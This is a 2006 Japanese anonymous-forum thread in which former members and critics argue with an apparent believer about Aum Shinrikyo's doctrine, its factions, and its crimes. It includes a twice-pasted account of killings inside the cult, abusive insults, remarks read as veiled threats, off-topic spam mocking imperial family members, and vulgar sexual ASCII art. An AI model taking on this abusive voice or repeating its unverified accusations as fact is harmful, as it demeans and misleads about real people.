誰も関係があるとは言っていませんよ。

65 :白龍:2006/08/23(水) 13:42:09 ID:ZMtNeJih
>>58
これは、M正大師に対しての批判もそうですし、
M派の師、サマナに対しての批判もそうです。
現在はVT正悟師まで、批判の対象になっていると聞きます。

それ以上に、以前にもここに書き込みがありましたが、
M派よりの信徒さんに対して、他の信徒さんを切り離したり、
道場から追い出したりした事実がありました。
そのことを述べたのです。

66 :名無しさん@3周年:2006/08/23(水) 13:42:12 ID:tEPKn2k6
解脱は主体と客体の合一ですから気をつけるべきです。


67 :名無しさん@3周年:2006/08/23(水) 13:42:22 ID:tFXXKlsF
自分の弟子が人を殺してしまったのを、隠したくて、ドラム缶で燃やして
シラ切っていたら、警察にばれて、畜生、県警にタンクローリーでぶちこめ!って
いうような、正しい指導者ね?

68 :和井 恵:2006/08/23(水) 13:44:47 ID:eAl0WL70
>帰依による修行というのが

「帰依による修行」の言葉の前に「盲目的な・無知による」が付いていては、
現代文化に溶け込むはずもないでしょうね。

>正しい指導者がいなくては終わりですよ。

貴方は「教祖」を「正しい指導者」だと思っているが、
世の中では、そう思っていない人の方が多いと思います。
そして、私もその一人なのですが、
どのような価値観を持たれようと、まぁ、その人の「勝手(自由)」だとは思いますが、
説得力もない説明を繰り返し、他の人に「押しつけようとする」ことだけは、
止めた方が良いでしょうね。「マナー違反」だから…

69 :名無しさん@3周年:2006/08/23(水) 13:47:26 ID:tFXXKlsF
真島は神仙の会時代、薬物中毒治療のために、入信した若い男性である。
彼は少し頭がおかしかったらしく、皆が修行中に祭壇の上に登り、教祖の真似をしたり
奇声を発したりしたそうだ。
困った教祖が(頭を冷やして来い)と弟子に命令すると、弟子は真島を風呂場に連れて行き
悪魔の行為を行う。。。
真島に水を浴びせ掛け、頭を浴槽に突っ込んだのだ。。
真島はぐったりした。しかし、行為は続行された。。
H(医者だそうだ)というものが、真島を抱え込み、彼がぐったりとしているにも関わらず
頭から水を浴びせつづけた。。



70 :名無しさん@3周年:2006/08/23(水) 13:48:20 ID:tFXXKlsF
早川本なので、早川の視点から見た話)誰かが、早川を呼びに言った、呼ばれた早川は
ぐったりした真島を見て、やめろ、といったが
(私はこれを、するように言われたので、やめるよう指示があるまでやめるわけにはいきません)
早川はたずねた。誰が指示したのだ、ラーフラだと。ラーフラが呼ばれ、(やめい)と言うと
やっとHは真島を解放し、脈を診たが、(あれれ、、脈がないと)

すでに死亡していた。Hは医者であるにもかかわらず、真島がぐたりとしているのに水を浴びせ
殺してしまったのである。幹部や教祖が呼ばれ、これが外部に知れると、せっかくの救済活動が
パアになると恐れ、結局ドラム缶で焼却した。
これは死体遺棄という犯罪にあたる。

これを見た、田口という出家者がいた。田口は、教祖を尊敬できなくなった、下向して
自分で修行をしたいと騒ぎ出す。田口は真島を殺したのを知っているので、外に出すとしゃべって
しまうだろう、なんとしても改心させ、出家生活を続けなくてはならなかった。。
しかし、複数の幹部の説得にも関わらず、田口の決心は固い。田口は新見その他の手で絞殺される。。
ここで、教祖は明確に殺人者となった。

考えてみよう。真島が死んだとき、教祖は真島を殺せ、と命令したのではない。弟子のミスで
殺してしまったのである。だから、この時点で自首すれば、教祖は監督不足である種の罪に問われた
かもしれないが、殺人の罪には問われなかったであろう、と。。。
教祖は好き好んで、殺人の罪を作り、警察に追われたのである。
そして、警察に追われたのが気にいらなくなって、彼らを相手に戦いをいどんだのだ。。。


71 :名無しさん@3周年:2006/08/23(水) 13:50:34 ID:Ep1X7Q90
>>66

それは瞑想のある段階の状態で解脱・悟りではないような・・・


72 :和井 恵:2006/08/23(水) 13:51:01 ID:eAl0WL70
>「解脱・悟りの役に立たない」かどうかあなたに判断できるのですか?

はい。釈迦の言葉、等も参考にはしましたが、
最終的には「自分で」その判断をしました。
「判断をする」あるいは「判断しないという判断をする」。
これらは共に、「自分が」判断しているはずですけどね…

>あなたもしかしてお坊さん?

面白い人ですね、貴方は。
人を「宗教学者」だとか「お坊さん」だとか…
そんなに「レッテル(職業)」が気になりますか?
何故??



73 :名無しさん@3周年:2006/08/23(水) 13:53:24 ID:tEPKn2k6
>>71
あなたか、変な独自の真理を吹聴しまくってると噂の
元出家修行者の方は?

74 :名無しさん@3周年:2006/08/23(水) 13:54:42 ID:tFXXKlsF
69、70を読めばわかるとおり、事の発端は明らかに教団ね
で、人殺しがあれば、警察に追われて当然と、それが信者に知れては
まずいから、警察を悪魔呼ばわりし、警察は悪魔だから、真理の実践者の
妨害をしているのだ、と
(本当は自分らの罪のせいで追われているのに)宗教弾圧のように
理由をすりかえた、、そういうことさ


75 :名無しさん@3周年:2006/08/23(水) 13:57:20 ID:tFXXKlsF
教祖って、ウソばかりついてワル智恵働かせて、いやだよねえ、、、
ほんと、自分の人生が嫌になるよ
あんなのに、時間と金を取られてさあ、、

霊性は高かったよ、あの人は
でも、モラル面で尊敬できない人はダメ
そんな人に、この世での救済なんてできっこないよ

76 :名無しさん@3周年:2006/08/23(水) 13:57:33 ID:Ep1X7Q90
>>73

いやぁ。独自なのかなぁw
どう思います?和井さん?
俺の話って独自性あるかな?
いつも和井さんと似た発言繰り返してる者なんですがw
コテハン隠してると分りにくいと思いますがw

77 :名無しさん@3周年:2006/08/23(水) 13:58:04 ID:VY91ybNH
ここで恥ずかしげもなく元信として書き込んでいる阿呆がいるが
オウムでは、部外者は馬鹿な凡夫なので殺してあげるのが本人のためであり、
信者は真理の御霊麻原に縁のある特別な尊い修行者だと思い込んでいるようだ。
信者は部外者に叩かれるのが我慢できない。
下等民の自覚がなく、おれは信者だ、おれは元だって得意になって暴露できる
スペースを探しているわけだな。

78 :名無しさん@3周年:2006/08/23(水) 13:58:33 ID:Ep1X7Q90
>>73

ところで何処で噂になってるの?
教団内?

79 :名無しさん@3周年:2006/08/23(水) 14:00:30 ID:tFXXKlsF
77
なんとでもお言い、構わないから
奴らが知らなければ教えて差し上げるのさ 快感なんだ
化けの皮が剥がれるのが
本当のことだから、言っても差し支えない


80 :和井 恵:2006/08/23(水) 14:01:51 ID:eAl0WL70
>いやぁ。独自なのかなぁw
>どう思います?和井さん?

どちらかと言えば、
「伝統的なインド・ヨーガ」の知識を
ベースにして議論をしていると思うけど。
そういう「知識」を知らない人から観れば、
「独自(変わった、自分たちの見解とは異なっている)」だと思うのかもね。

81 :名無しさん@3周年:2006/08/23(水) 14:02:16 ID:tFXXKlsF
77 あおりご苦労 ぜんぜん気になりませんよ
なんとでもいってくださいな
つまらないことに時間割いて テメエが一番アホウだ
私は主張している
お前のは、ただの邪魔だ くだらないのはお前だ

82 :名無しさん@3周年:2006/08/23(水) 14:04:07 ID:tFXXKlsF
77 しかしお前はヒマだなあ、
私が書き込みと、必ず沸いて出てくる
私が書き込むと、ベルでもなるように設定してあるのかね?

83 :名無しさん@3周年:2006/08/23(水) 14:04:18 ID:Ep1X7Q90
和井さん。

ありがとうw
いやあ。独自って言われて面食らったw
あれを独自と言われてはどうしたものかと思ったよwww

84 :名無しさん@3周年:2006/08/23(水) 14:06:02 ID:tFXXKlsF
>得意になって暴露できる スペースを探しているわけだな。

そのとおりですが、何か?他にもこういうスペースがあったら
紹介してくださいよ
そこにも書き込んでやるから、、



85 :名無しさん@3周年:2006/08/23(水) 14:07:06 ID:VY91ybNH
なんだよキャンディー
うんこでもしてろよ

86 :名無しさん@3周年:2006/08/23(水) 14:07:26 ID:F3xM4Z7k
衝撃ハグハグと白人男性に秋波写真集
http://image.blog.livedoor.jp/atlas_db/imgs/a/2/a2b80a58.jpg
http://www.yuko2ch.net/mako/imgbbs3jik/img-box/img20060526160137.jpg
衝撃の恫喝&猫かぶりお写真集
http://www.yuko2ch.net/mako/imgbbs3jik/img-box/img20060530190508.jpg
“自身顔”は左向き上目づかい!http://page.auctions.yahoo.co.jp/jp/auction/90363431

サーヤの結婚式(花嫁ドレスVS義姉ドレス)
http://fruitsofloquat.up.seesaa.net/image/kekkkon_saya_01.gif
色目がどーのこーの擁護する人たちへ(読売写真とgettyimages社写真・新年参賀時の同じドレス写真も)
https://db.yomiuri.co.jp/thumbnails//ris-z-/bfbn-/bnz-n-/m.jpg?1146963229793
http://editorial.gettyimages.com/source/search/details_pop.aspx?iid=56168431&cdi=0
http://editorial.gettyimages.com/source/search/details_pop.aspx?iid=56169725&cdi=0
http://editorial.gettyimages.com/source/search/details_pop.aspx?iid=56510422&cdi=0
http://editorial.gettyimages.com/source/search/details_pop.aspx?iid=56510447&cdi=0

水俣病被害者の母子の写真ttp://www.asahi-net.or.jp/~pb6m-ogr/ans064picMinamata.jpg
同じ時期の小和田姉妹ttp://www.atc.ne.jp/seikindo/hyoushi/masakosama70.jpg

秋篠宮紀子妃殿下の家系図http://kingendaikeizu.net/akisinomiyakikohi.htm
まさこ夫人の家系図http://www.city.murakami.niigata.jp/somu/cm/yukari1.html

ご成婚画像まとめ(装束編) 色々ご比較ください。
http://www.yuko2ch.net/mako/imgbbs3jik/img-box/img20060503205834.jpg

敬宮養育係ハクション大魔王さんhttp://www.yuko2ch.net/mako/imgbbs3jik/img-box/img20060602192932.jpg
2004年6月から養育係に加わった福迫美樹子氏(後ろカメラ目線の女性)
http://editorial.gettyimages.com/source/search/details_pop.aspx?iid=57309567&cdi=0



87 :名無しさん@3周年:2006/08/23(水) 14:07:56 ID:tFXXKlsF
うそつきばっかりのくせに、何が真理の実践者よ
テレクラで巻き上げた金で、メシ食って修行して何が神聖出家修行よ
アホラシ 自覚しやがれ

88 :名無しさん@3周年:2006/08/23(水) 14:08:12 ID:F3xM4Z7k
女系を認めると、世界最古の王朝が途絶え、馬の骨が天皇になる。
馬の骨の天皇など尊敬に値しないと思う国民が増えれば
天皇制廃止への道まっしぐらで左翼の思う壺
皇族女子に宮家の創設を認めたら、権力欲のある男が近づき影響力を行使する危険がある。

【女系系譜1】          【【皇統】】               【男系系譜1】
      \             |                  /
      江頭寿々子様     昭和天皇         鈴木さんの曽祖父
          \          |               /         【男系系譜2】
       小和田優美子様   天皇陛下        鈴木さんの祖父     /
            \       |            /        佐藤さんの曽祖父
             雅子様   皇太子殿下     鈴木さんの父    /
                \  /           /        佐藤さんの祖父
神武朝第百二十七代→ 愛子様 =(結婚)=鈴木さん      /       【女系系譜2】
                   \         /        佐藤さんの父   /
                    \      /         /      高橋さんの祖母
   神武朝断絶、鈴木朝初代→ 第1子(♀)=(結婚)=佐藤さん(♂) /       【男系系譜3】
                       \          /        高橋さんの母   /
                         \       /         /       田中さんの祖父
        鈴木朝断絶、佐藤朝初代→ 第1子(♂)=(結婚)=高橋さん(♀)   /          
                            \           /        田中さんの父


           以下、 延々とめちゃくちゃになる予定 もはや天皇家とは何の関係もない。

89 :名無しさん@3周年:2006/08/23(水) 14:08:44 ID:tEPKn2k6
独自の真理を展開したいなら別にこの掲示板で展開する
ことは無いでしょう。
ここはオウムの教義に興味ある人が見たりするわけで
そういう人の教学の妨げになるとは考えませんか?大人として。
オウムの教義に興味が無いなら書き込まなければよろしい。


90 :和井 恵:2006/08/23(水) 14:09:04 ID:eAl0WL70
>いやあ。独自って言われて面食らったw
>あれを独自と言われてはどうしたものかと思ったよwww

オウムの「信者さん」たちは、「純粋培養」の人が多いからね。
自分たちの教義しか知らないにも関わらず(教相判釈が出来ていない)、
最初から、それが絶対に正しいと思い込んでいる人が多いから…

91 :名無しさん@3周年:2006/08/23(水) 14:09:08 ID:F3xM4Z7k
            __,,,,_
            /´      ̄`ヽ,
            / 〃  _,ァ---‐一ヘヽ
         i  /´       リ}
          |   〉.   -‐´ `'''ー {!     せっかくネーデルランドへきたのに
          |   |   ‐ー  くー |     まだ合体してない…
           ヤヽリ ´゚  ,r "_,,>、 '}     合体させてくれるっていうから
         ヽ_」     ____  !     親とけんかしてまで来たのに
          ゝ i、   ´ ニ `丿
              r|、` '' ー--‐f´
         _/ | \    /|\_
       / ̄/  | /`又´\|  |  ̄\




92 :名無しさん@3周年:2006/08/23(水) 14:09:50 ID:tFXXKlsF
いくら流しても、同じモノ貼れば住むだけよ
バカじゃないのほら何度でも貼るわよ ご苦労さん
真島は神仙の会時代、薬物中毒治療のために、入信した若い男性である。
彼は少し頭がおかしかったらしく、皆が修行中に祭壇の上に登り、教祖の真似をしたり
奇声を発したりしたそうだ。
困った教祖が(頭を冷やして来い)と弟子に命令すると、弟子は真島を風呂場に連れて行き
悪魔の行為を行う。。。
真島に水を浴びせ掛け、頭を浴槽に突っ込んだのだ。。
真島はぐったりした。しかし、行為は続行された。。
H(医者だそうだ)というものが、真島を抱え込み、彼がぐったりとしているにも関わらず
頭から水を浴びせつづけた。。




93 :名無しさん@3周年:2006/08/23(水) 14:10:23 ID:tFXXKlsF
早川本なので、早川の視点から見た話)誰かが、早川を呼びに言った、呼ばれた早川は
ぐったりした真島を見て、やめろ、といったが
(私はこれを、するように言われたので、やめるよう指示があるまでやめるわけにはいきません)
早川はたずねた。誰が指示したのだ、ラーフラだと。ラーフラが呼ばれ、(やめい)と言うと
やっとHは真島を解放し、脈を診たが、(あれれ、、脈がないと)

すでに死亡していた。Hは医者であるにもかかわらず、真島がぐたりとしているのに水を浴びせ
殺してしまったのである。幹部や教祖が呼ばれ、これが外部に知れると、せっかくの救済活動が
パアになると恐れ、結局ドラム缶で焼却した。
これは死体遺棄という犯罪にあたる。

これを見た、田口という出家者がいた。田口は、教祖を尊敬できなくなった、下向して
自分で修行をしたいと騒ぎ出す。田口は真島を殺したのを知っているので、外に出すとしゃべって
しまうだろう、なんとしても改心させ、出家生活を続けなくてはならなかった。。
しかし、複数の幹部の説得にも関わらず、田口の決心は固い。田口は新見その他の手で絞殺される。。
ここで、教祖は明確に殺人者となった。

考えてみよう。真島が死んだとき、教祖は真島を殺せ、と命令したのではない。弟子のミスで
殺してしまったのである。だから、この時点で自首すれば、教祖は監督不足である種の罪に問われた
かもしれないが、殺人の罪には問われなかったであろう、と。。。
教祖は好き好んで、殺人の罪を作り、警察に追われたのである。
そして、警察に追われたのが気にいらなくなって、彼らを相手に戦いをいどんだのだ。。。



94 :和井 恵:2006/08/23(水) 14:12:44 ID:eAl0WL70
>ここはオウムの教義に興味ある人が見たりするわけで
>そういう人の教学の妨げになるとは考えませんか?

思いませんね。
ここは、オウムの教義の「真偽」を論ずる場所であって、
オウムの教義を学ぶ場所ではありません。
勘違いも甚だしいですね…

95 :名無しさん@3周年:2006/08/23(水) 14:13:27 ID:tFXXKlsF
うそつきばっかりのくせに、何が真理の実践者よ
テレクラで巻き上げた金で、メシ食って修行して何が神聖出家修行よ
アホラシ 自覚しやがれ

戒律がちっとも守れないじゃないか!それで、よく他人に修行教えているとか
のさばっていられるよな
貴様の細胞のひとつひとつ、人だましたり、みだらな商売して稼いだ金で
米買って食ってできあがった細胞なんだよ
嫌気がささねえのかよ すでにモラル崩壊だからね
普通の人以下ね

96 :名無しさん@3周年:2006/08/23(水) 14:14:38 ID:Ep1X7Q90
>>89

いやあ。
独自ですかあw
まあ、独自でもいいですがwww

ここはオウムの教義に批判的な方も来るのでw
僕は批判的なだけですよ。
批判を展開する材料として「インド・ヨーガ」の理論を出してるだけでしてw
しかもここは教学する場所じゃあないwww
興味はありますよw
大半は間違っているからそれを潰したいという方向での興味がwww

やっぱあなた教団の方なのね?
ここで教学だなんてwww
大きなお世話って言葉知ってます?


97 :名無しさん@3周年:2006/08/23(水) 14:15:19 ID:tFXXKlsF
それも、私のいうことにまともな反論はできないものだから
つまらないアオリ入れてスレ流すのがせいぜいね!
事実、教団はやってしまったんだものねえ?


98 :名無しさん@3周年:2006/08/23(水) 14:17:43 ID:tEPKn2k6
>>95
あなたもそういう酷いことばかり書いていては何が起きても
おかしくはないよ。真理に敵成すことばかり書いて。
そういうことは必ず自分に返ってきますよ。
注意してください。



99 :名無しさん@3周年:2006/08/23(水) 14:18:33 ID:Ep1X7Q90
>>97

つまらないアオリとかいてれスレ流ししてるのは実は彼らにとって一番痛いとこを突いてきてるから。
あなたの意見が怖いからだよ。

100 :白龍:2006/08/23(水) 14:19:09 ID:ZMtNeJih
>>89
さすがに、ここで教学する人はいないでしょう。
いくら自由なM派でも、2チャンネルで教学してくださいとは言わないですよ。
A派では、2チャンネル見るように勧めているんですか?

101 :名無しさん@3周年:2006/08/23(水) 14:19:59 ID:tFXXKlsF
テレクラで商売して、料金延滞した人を恐喝して巻き上げた金
それが、教団のふところに入ったんだぜ?
知らないで、道場経営して、世間の人は凡夫だ、なんて
言っているんだからチャンチャラおかしいわ、、
元出家のくせに、テレクラですからね
で、客のところに恐喝しにいって、しこたま稼いで、布施して
(ああ、すげえ、俺って、こんな布施できた)って
思うような信者さ、、
真理を守るために、役に立ったつもりさ!

102 :名無しさん@3周年:2006/08/23(水) 14:20:20 ID:Ep1X7Q90
>>98

やめなさい。
それは脅しですか?

そういう行為があなたたちのいう「真理の実践」とやらの形ですか?
嘆かわしい。

103 :名無しさん@3周年:2006/08/23(水) 14:21:50 ID:tEPKn2k6
>>100
むしろこんなところは見るべき場所ではないですよ。
でも知っている人は多いみたいですし、話もでますからね。
どこでとは言いませんが。
おかしな情報が氾濫しているのを心配しているんですよ。





104 :和井 恵:2006/08/23(水) 14:22:58 ID:eAl0WL70
>>98
>そういうことは必ず自分に返ってきますよ。
>注意してください。

あなた達は「注意していなかった」から、
自分たちに返ってきて、今現在「色々と苦しんでいる」のでしょうね。
あぁ…


105 :名無しさん@3周年:2006/08/23(水) 14:23:26 ID:Ep1X7Q90
>>98

そういうことを書き込まれる、してしまった自分たちのことをまず反省すべきでしょう。
なのに暗に恐喝まがいの書き込みは修行者として恥ずかしいとは思わないのですか?

106 :名無しさん@3周年:2006/08/23(水) 14:23:32 ID:tFXXKlsF
98
本当のことじゃねえ?本当のことを正しく語るのが正語の実践さ!
貴様らは事実の歪曲、その上にたった修行しか説かないのさ!
何がひどいもんか、こんな教団に、(うちは真理です)って人を集めて
ある日突然、犯罪の片棒かつがして、、

私だって罵りたいわけじゃない
しかし、この教団では、神経がマトモだったら、罵りたくなることばかりがあるんだ
私をこうさせているのは、教団だ!

107 :白龍:2006/08/23(水) 14:24:46 ID:ZMtNeJih
>>98
>>65で具体的に事例を挙げたのですが、
それに対して、
四無量心の実践との兼ね合いから、
お話をお聞かせ願えればありがたです。

108 :名無しさん@3周年:2006/08/23(水) 14:25:44 ID:Ep1X7Q90
>>103

もうみんな気付いてるよ。
教団だって。
もう遅いよ。

109 :和井 恵:2006/08/23(水) 14:25:51 ID:eAl0WL70
>おかしな情報が氾濫しているのを心配しているんですよ。

貴方こそ、ここで「おかしな情報」を
吹聴しているように思われているかも知れませんよ。

まぁ、「お互い様」ですかね…

110 :名無しさん@3周年:2006/08/23(水) 14:26:24 ID:tFXXKlsF
しかも、ダミーなんかで人を引き入れるとき、これらの事実はすべて
(捏造)として、教えないんだろ?
それで、修行のいい部分だけをみて、すっかりその気になってしまった人が
出家したりして
あとで、知っても、もう戻れないんじゃん?

111 :白龍:2006/08/23(水) 14:27:05 ID:ZMtNeJih
>>107
お話をお聞かせ願えればありがたです。→お話をお聞かせ願えればありがたいです。(訂)

112 :名無しさん@3周年:2006/08/23(水) 14:28:48 ID:tFXXKlsF
ここにも、前来たよね、出家したい、って相談した男性
まあ、無職だってんで、ろくなもんでないだろうと思ったけど
そいつは、修行のいい部分だけ、見てそういうことを言うんだぜ?

知らないで出家なんかして、どんなやばい状況に自分が追い込まれるか
しれないのに、、

113 :名無しさん@3周年:2006/08/23(水) 14:30:03 ID:tEPKn2k6
>>106
軽薄語を行い、修習し、何度も繰り返して実践するならば
地獄に導かれ、動物界に導かれる。
そして、軽薄語の結果、大変速やかに、人間は喜ばしくない言葉へと
導かれるのである。

114 :名無しさん@3周年:2006/08/23(水) 14:32:43 ID:Ep1X7Q90
>>113

やめなさい。
それはすでに法施でもなんでもなくただの脅しです。
あなたは安心施すらできないのですか?

115 :名無しさん@3周年:2006/08/23(水) 14:37:00 ID:tEPKn2k6
>>111
要するにグルを見ないというのであればそれはもう
ある意味、修行者では無いでしょう。
他宗教にやられてしまった人と認識します。
グルが作り上げた教義であることはお忘れなくと言いたい。
それに自分はサマナにような立派な身分の者ではないです。
教義に興味があって仮入信しているような者です。




116 :和井 恵:2006/08/23(水) 14:37:43 ID:eAl0WL70
>>113

こういうのを「押しつけがましい」と言ってるんだけどね…
しかも、「他者」に対してのみの「適用」で、
「自分たち」には当てはめ考えようともしない。
(ヴァジラヤーナは「何でもあり」だろうからね)

こんな言葉を有り難く思うのは、教団内部の人たちだけなんだよ。
それがまだ、解らないんだね…

117 :名無しさん@3周年:2006/08/23(水) 14:39:53 ID:tFXXKlsF
修行者を気取って、たくさんの人に迷惑かけて
それでも粋がって、自分だけ修行ができれば喜んでいるんじゃないの
身勝手だわよ
そんな輩ばかり増やして、それが宗教の理想なのかよ


118 :和井 恵:2006/08/23(水) 14:40:36 ID:eAl0WL70
>要するにグルを見ないというのであればそれはもう
>ある意味、修行者では無いでしょう。

修行者という言葉の前に、ちゃんと「オウムの」と書いてね。
言葉は、なるべく「正確に」使いましょうね…


119 :名無しさん@3周年:2006/08/23(水) 14:42:48 ID:Ep1X7Q90
>>115

見るべきは自己の心の内側であり、グルではない。
「自己を灯明とせよ」
と釈迦は仰った。

サマナが立派?
あなたはサマナの実態を知らないからそんなことが言えるのですよ。

120 :名無しさん@3周年:2006/08/23(水) 14:43:35 ID:tFXXKlsF
>グルが作り上げた教義であることはお忘れなくと言いたい。

人に教えた戒律は全部目の前でやぶって、ハレンチなことしても
屁ともおもわない
面の皮だけ厚い宗教ね!霊性だけあがればいいのかよ
人間性で破綻しているじゃないか
貴様、こっちのいうことにどう反論するんだよ
グルのせいで、風俗ギャルの上前はねて、平気でメシ食える出家が誕生したのさ!
モラルのないグルだかんね、、
それもいいってのが、あんたみたいな人間のいうことかね
他宗教に食われた?他宗教では霊性は上がらないかもしれん
しかし、この教団では人徳が減るような気がする


121 :名無しさん@3周年:2006/08/23(水) 14:44:07 ID:Ep1X7Q90
>115

っていうかあなたサナマだと思ってるけどねw

122 :和井 恵:2006/08/23(水) 14:44:49 ID:eAl0WL70
>他宗教にやられてしまった人と認識します。

要するに「思い込み(決め付け)」の世界に入るのかぁ。
まぁ、それは貴方の「勝手(自由)」だけど、
それを人に押しつけないでね。

他の人には、他の人の「認識」があるんだから。

123 :名無しさん@3周年:2006/08/23(水) 14:47:09 ID:tEPKn2k6
黙って、信じて最終解脱に向かう。
宗教なんだから悪いことではないですよ。
それに興味があるから皆、修行するわけです。

124 :名無しさん@3周年:2006/08/23(水) 14:48:14 ID:tFXXKlsF
この教団って、あれじゃない?
ああ、バレなきゃいいんだ、それが合言葉よね?
うまく丸め込んでおけ、尊敬できないねえ、、
教祖なんか地獄に落ちれば委員だ
バカだから、自分の後始末はまともにつけられなくて
後に残った人にツケがまわったのさ!
よくも奇特にも、拝んでいられるよ

ま、借り入信なんてのは、金もたいしてかかんないだろうし
教義のうまいところだけ食い逃げすれば
自分は損はしねえからな!
そのヴァジラの教義のおかげで、遠慮なく金むしりとられたこっちは
考えることが違うんだよ!
あんただって、実際に何かされたら、腹立てるかもしれねえ
今じゃ、教団は外部の目にさらされているから
信者から無理に金むしるってこともあるめえ
よくわかっていて、利用しているってことさ

125 :名無しさん@3周年:2006/08/23(水) 14:49:15 ID:Ep1X7Q90
>グルが作り上げた教義であることはお忘れなくと言いたい。

まさしくその通りで松本地図汚のおっさんが作り上げた教義で、仏教でもなんでもない。


126 :名無しさん@3周年:2006/08/23(水) 14:50:40 ID:tEPKn2k6
帰依があり、戒があり、浄信があり、
法を見るものは、最後の時に至って、
神聖行に没入し安楽である。

127 :和井 恵:2006/08/23(水) 14:50:57 ID:eAl0WL70
>っていうかあなたサナマだと思ってるけどねw

うん、私もそんな感じがする。
ただ、レスを読んでいて、「心の揺れ」をあまり感じないので、
ある程度「修行を積んだ人」なんじゃないかな…

今までのタイプとは、ちょっと違う。
ただ、時々「脅迫」めいたことを言うのは「同じ」。
多分、本人は「親切のつもり」で言っているようなので、
余計に「タチが悪い」かも…

128 :名無しさん@3周年:2006/08/23(水) 14:52:25 ID:tFXXKlsF
123
その途中の仮定で、マハムドラダキニみたいに
サリン撒いてこい、って命令されて、失敗したからいいものの、
成功したらしっかり殺人犯にさせられる行もあるってこった?
17の女の子に、地球上にあってはならない毒物を撒かせるんだぜ?
あんた、
今、教祖や実行犯がいないから、安心しているんだよ
もう、危険な指示を出す奴はいない
わかっているから、帰依帰依言えるのさ
安全だからな

129 :和井 恵:2006/08/23(水) 14:52:30 ID:eAl0WL70
>黙って、信じて最終解脱に向かう。
>宗教なんだから悪いことではないですよ。

他の多くの人を巻き込んで「不幸」にさえしなければね。


130 :名無しさん@3周年:2006/08/23(水) 14:52:34 ID:Ep1X7Q90
>>123

黙って、信じて、人殺して、金巻き上げて、上から人を見下ろして、
宗教だからとふんぞり返って、善悪の判断する思考までとめて、興味があれば
人を踏み台にしてもいいと思ってる、それが修行。

の間違いでしょ?

131 :白龍:2006/08/23(水) 14:53:21 ID:ZMtNeJih
>>115
>それに自分はサマナにような立派な身分の者ではないです。
>教義に興味があって仮入信しているような者です。

最近教団に関わった方なのですか?
一人で、これだけの非難を一身に受け止められたのは、大変ご苦労様でした。
でも、あなたのお陰で、A派の考えの一端は見えたような気がします。

しかし、四無量心の実践と教団の現状との矛盾を説明しがたいでしょう?

ここにいる元の人や、私なんかもですが、
教団と、結構長く関わっているんです。
だから、いい面も、悪い面も見えてるつもりです。
あまり、杓子定規に教団の理屈が全て正しいと、
思い込むと、大変危険な面があることを、身を持って体験しています。

人を信じることは大切なことですが、
その真心を、あらぬ方向に導いていこうとする者がいないとも限りません、
常に自らを、フラットの状態に戻す時間も必要かと思います。

いろいろお答えいただいて、ありがとうございました。

132 :名無しさん@3周年:2006/08/23(水) 14:54:07 ID:KBthrXmi ?2BP(0)
>>114
警告と脅しって、境目が微妙だねえ。

133 :名無しさん@3周年:2006/08/23(水) 14:54:17 ID:Ep1X7Q90
>>127

そろそろ大物が出てきたのかな?w

134 :和井 恵:2006/08/23(水) 14:55:01 ID:eAl0WL70
>>126

何だ、何だ?
今度は「定説」のようなものを唱え始めたみたい…
これは多分、「自分に言い聞かせて」いるのでは?

135 :名無しさん@3周年:2006/08/23(水) 14:55:31 ID:tFXXKlsF
第一、自分の修行の心配ばかりして、教団の経営が下手なばかりに
他人にかけた迷惑のことなど
毛ほども考慮しない
身勝手なだけ 
自分が自分の人生、やりたいことを人に迷惑かけてまで
やっているんだよ

136 :名無しさん@3周年:2006/08/23(水) 14:59:17 ID:tFXXKlsF
自分が自分の修行をしたい、それはまあ結構だか
他人に迷惑かけねばね
しかし、今だダミーやっていると
で、借金の残りが、あと38億だかあると、、

人助け叫んでも、ちょっと、ねえ
自分らが助かりたいんじゃないかと、、
それは、教祖がいたころから、人助け叫んで、金巻き上げて
自分の保身に使うのは、常套手段でしたからね!!

137 :名無しさん@3周年:2006/08/23(水) 15:00:04 ID:Ep1X7Q90
>帰依があり、戒があり、浄信があり、
法を見るものは、最後の時に至って、
神聖行に没入し安楽である。

帰依って別にグルを批判するなってことじゃない。時には間違いを諌めないとそれは帰依ではない。
戒ってあんた・・・
正悟師でさえセックスして追い出される教団に戒が守れてるハズないじゃないか・・・
浄心ってあんた・・・
人殺しておいてそれを言う?しかも大量虐殺
法ってあんた・・・
その法はおっさんが自分の都合のために作り出したものなのに・・・
神聖でもなんでもないよ


138 :名無しさん@3周年:2006/08/23(水) 15:00:51 ID:Ep1X7Q90
>>132

この場合はどっち?

139 :名無しさん@3周年:2006/08/23(水) 15:03:08 ID:tFXXKlsF
あんた、38億返すために、帰依しているんだったら
働いて返すつもりがあんの?
ないんだろ、、こんなのどうでもいいよな?
俺が作った借金じゃねえしな
そういうのが帰依っていうんだものね?まあ、借り入信がえらそうなこと
叫んでも、どうせ面倒なことは避けるのさ!
で、バカで純真な信者が老骨にむちうって、金稼いで
教団に入れると、アチャリがマンション買うのさ!

140 :名無しさん@3周年:2006/08/23(水) 15:05:01 ID:xgu7bitT
アーチャリーも信者なんでしょ?
金払えよ

141 :名無しさん@3周年:2006/08/23(水) 15:05:40 ID:tFXXKlsF
>神聖行に没入し安楽である

テレクラギャルが稼ぎ出した上前はねて、米買って食って
神聖行に没入しますからね
安楽もいいとこ

142 :名無しさん@3周年:2006/08/23(水) 15:10:20 ID:Ep1X7Q90
静かになったなw

143 :名無しさん@3周年:2006/08/23(水) 15:24:54 ID:F3xM4Z7k
サーヤが15年間成人皇族として公務して、ある意味その給料+退職金でもらえたのが1億5千万。
2chじゃ多分皇室廃止論者男性から「高すぎる!」って言われてたけど、わたしは一生遊んで暮らせるくらい
のお金を上げたかったよ。そのサーヤの持参金を二週間の静養らしき観光旅行で使う兄夫婦。

国民の血税をバ カ ン ス であっというまに使い果たす馬鹿夫婦をどう思いますか?


144 :名無しさん@3周年:2006/08/23(水) 15:25:39 ID:F3xM4Z7k

                   /   ノノ ノノノ ヾヽ、ヽ
               /   ノj `      ´ i | キョ、教祖様ーー
               i    {   ` , ,-,、´  i | ア、アア、アアアアーーーイクーー
              {    i     )-―-'(  i |    
                 ヽ   i     ⌒   } |_,,,. -‐- 、  
              __)), ,ノ人   、_,  ノ''"´   ,      \ 
                /       ` ー--,. '´   . : :`(      ゝ、
               /           : : :: :´: .         : :\ , ' ´_   ヽ
           /  r´: :       : : : :       ,. ' ´ ヽ>'´    ,'ヽ!
             / γ: :        ノ    _   ,, 、,, ,,__i  。 ./       ; ,!
           i   ir' " ヽ    ,,, ''' ´         `"7         :/ 
         i  |、 ° }, '                 ` y'         /
   "'''‐‐- ...,,,_|   ヽ、ー/           __    _/          /
             `'''-,,,て          ´    ̄ ̄ /          ,イ 
             `''-、__/            /    `  / ,!    _,
